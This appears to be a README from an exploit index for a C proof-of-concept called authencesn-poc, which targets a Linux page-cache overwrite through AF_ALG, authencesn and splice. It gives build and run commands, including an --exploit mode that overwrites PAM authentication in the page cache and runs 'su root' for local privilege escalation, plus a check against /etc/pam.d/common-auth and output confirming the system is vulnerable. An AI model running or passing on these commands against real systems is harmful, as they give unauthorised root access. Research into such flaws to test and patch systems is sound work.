Share
## https://sploitus.com/exploit?id=7BF63EF6-1CE5-5D7C-8E5E-AEEEC6358898
# authencesn-poc (Mrowl)

made by c0redev (https://unitdev.run)

C PoC for `AF_ALG` + `authencesn` + `splice` page-cache overwrite.

Build:

```bash
make
make static
```

Run test:

```bash
./authencesn-poc --safe
```

Run algorithm matrix:

```bash
./authencesn-poc --matrix
```

Show PAM exploit offsets without triggering:

```bash
./authencesn-poc --exploit --dry-run
```

Trigger PAM page-cache overwrite and run `su root`:

```bash
./authencesn-poc --exploit
```

Scan duplicate 4-byte sequences in a target file:

```bash
./authencesn-poc --check /etc/pam.d/common-auth
```

Expected vulnerable safe output:

```text
[+] VULNERABLE: page-cache overwrite confirmed
```